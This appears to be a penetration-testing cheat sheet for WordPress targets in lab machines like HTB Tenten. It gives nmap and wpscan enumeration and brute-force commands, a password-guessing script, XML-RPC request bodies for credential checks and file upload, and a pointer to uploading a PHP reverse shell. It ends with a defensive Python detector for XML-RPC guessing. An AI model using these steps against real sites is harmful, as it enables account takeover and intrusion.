WordPress
Version #
- In the HTML meta generator tag
- In the interesting URL paths listed below
Credentials #
- You usually need valid WordPress credentials before you can exploit anything
- Try visiting /?author=1 and enumerate author IDs from there to discover usernames
- There are no default credentials; the installer asks the user to set them
- You can still guess valid usernames
Recon #
# Kickoff nmap
nmap -p80 --script http-wordpress-enum,http-wordpress-users 10.10.71.200
# Using wpscan (you can omit the API token, but some
# information will not be displayed)
# NOTE: wpscan may not report all vulnerabilities, especially
# in plugins
wpscan --url http://10.10.10.29 --api-token {API_TOKEN}
# Similar to above but on another path
wpscan --url http://10.10.10.29/wordpress --api-token {API_TOKEN}
- Check the HTML elements for "colorlib"; it is a WP plugin.
Interesting URL Paths #
# you may find version here
/wp-links-opml
/wp-links-opml.php
/readme.html
# uploads directory
/wp-content/uploads/YYYY/DD/FILENAME
# login
/wp-login.php
Interesting files #
# DB credentials
wp-config.php
Brute Force #
# Using nmap
nmap -p80 --script http-wordpress-brute 10.10.10.29
# User IDs can be extracted from here. Use Burp Intruder (sniper)
# with a list of user IDs from 1 to 100 generated by a bash for loop.
curl -s -I -X GET http://10.10.10.29/?author=1
# You can use this python script from
# https://github.com/relarizky/wpxploit
# This can take around 30 minutes to complete
# TIP: try using "admin" as username first
cd ~/data/tools/webapp/wpxploit
./exploit.py http://10.10.127.229/wordpress 5 15
# You can also use wpscan
wpscan --url http://10.10.127.229/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
- Once you have the credentials, you can try uploading a PHP reverse shell
- TIP: the brute force works by POSTing this XML-RPC body, which carries the username and password
<methodCall>
<methodName>
wp.getUsersBlogs
</methodName>
<params>
<param>
<value>
admin
</value>
</param>
<param>
<value>
gansta1
</value>
</param>
</params>
</methodCall>
Interesting URL Paths #
# most can be reported by wpscan
/wp-content/uploads/
/wp-admin/
/wp-admin/update-core.php
/wp-admin/upgrade.php
/install.php
/wp-cron.php
# accepts POST requests if enabled
/xmlrpc.php
# others
/plugins
/wp-content/plugins
For xmlrpc.php, you can use Burp Suite to send POST requests like this one.
POST /wordpress/xmlrpc.php HTTP/1.1
Host: 10.10.10.29
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 95

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
XML RPC calls #
# List all method calls
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
# Get blogs
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
# Uploading a file
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Themes #
- Look for exploits for the installed theme as well
Plugins #
- You can also search for plugin exploits. One way to determine which plugin is in use is via the HTML elements; the version can often be determined there as well.
- You can also add --plugins-detection aggressive --plugins-version-detection aggressive to wpscan
Troubleshooting #
- Sending a POST to /xmlrpc.php returns 200 OK but with a "parse error. not well formed" message; this is most likely caused by a missing PHP XML parser library on the server. I encountered this in HTB Tenten.
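The XML-RPC bodies above (system.listMethods, wp.getUsersBlogs, wp.uploadFile) and the "not well formed" failure are easy to inspect from the server side. The following Python is an added example, not code from this page, WordPress or wpxploit: it parses methodCall bodies, classifies them by the method used, and flags any client that repeatedly calls wp.getUsersBlogs, which is the brute-force pattern described under Brute Force. The request bodies and client IPs are constructed samples.

```python
import xml.etree.ElementTree as ET
from collections import Counter
# Methods that appear on this page: method enumeration, credential check, media upload.
METHOD_CLASS = {
    "system.listMethods": "enumeration",
    "wp.getUsersBlogs": "credential-test",
    "wp.uploadFile": "file-upload",
}

def parse_method_call(body):
    """Return (methodName, [top-level param strings]); malformed XML raises ValueError."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise ValueError(f"parse error. not well formed: {exc}") from exc
    if root.tag != "methodCall":
        raise ValueError("root element is not <methodCall>")
    name = (root.findtext("methodName") or "").strip()
    params = []
    for value in root.findall("./params/param/value"):
        # Accept both <value>text</value> and <value><string>text</string></value>.
        node = value.find("string")
        params.append(((node.text if node is not None else value.text) or "").strip())
    return name, params

def classify(body):
    """One of: enumeration, credential-test, file-upload, other, malformed."""
    try:
        name, _ = parse_method_call(body)
    except ValueError:
        return "malformed"
    return METHOD_CLASS.get(name, "other")

def flag_guessing(requests, threshold=5):
    """Given (client_ip, body) pairs, return IPs with >= threshold wp.getUsersBlogs calls."""
    hits = Counter(ip for ip, body in requests if classify(body) == "credential-test")
    return sorted(ip for ip, n in hits.items() if n >= threshold)

def guess_body(user, pw):
    # Constructed wp.getUsersBlogs body in the shape shown above.
    return (f"<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
            f"<param><value>{user}</value></param><param><value>{pw}</value></param>"
            "</params></methodCall>")

# Constructed sample traffic: one listing call, six guesses from one client, one malformed body.
LIST_CALL = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
SAMPLE = ([("203.0.113.5", LIST_CALL)]
          + [("198.51.100.7", guess_body("admin", f"pw{i}")) for i in range(6)]
          + [("203.0.113.5", "<methodCall><methodName>x</methodName")])
```

flag_guessing(SAMPLE) returns ['198.51.100.7']; feed it (client_ip, body) pairs pulled from a web server or WAF log to watch xmlrpc.php in production.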
References #
- Wordpress - HackTricks
- HTB Tenten